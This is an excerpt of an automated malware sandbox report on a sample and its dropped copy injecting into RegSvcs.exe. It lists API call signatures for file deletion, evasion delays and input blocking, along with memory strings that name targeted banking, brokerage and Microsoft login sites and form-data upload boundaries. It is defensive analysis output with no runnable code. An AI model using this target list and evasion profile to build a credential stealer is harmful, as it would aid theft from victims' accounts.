                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8133Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1708Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8131Jump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102644
                Source: C:\Users\user\Desktop\6BRa130JDj.exeAPI coverage: 4.6 %
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeAPI coverage: 4.9 %
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0031445A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031C6D1 FindFirstFileW,FindClose,0_2_0031C6D1
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0031C75C
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0031EF95
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0031F0F2
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0031F3F3
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003137EF
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00313B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00313B12
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0031BCBC
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0008445A
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008C6D1 FindFirstFileW,FindClose,2_2_0008C6D1
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0008C75C
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008EF95
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F0F2
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008F3F3
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_000837EF
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083B12
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008BCBC
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002B49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599537Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598419Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598305Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598139Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597919Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597373Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596279Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595621Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595317Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599233Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599102Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598992Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598733Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598497Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597841Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596147Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596044Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595915Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594264Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594154Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594046Jump to behavior
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd326de7d68210<
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd326c5f9c7285<
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000003.00000002.4527795907.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4527377722.00000000014E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E9548 LdrInitializeThunk,3_2_066E9548
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00323F09 BlockInput,0_2_00323F09
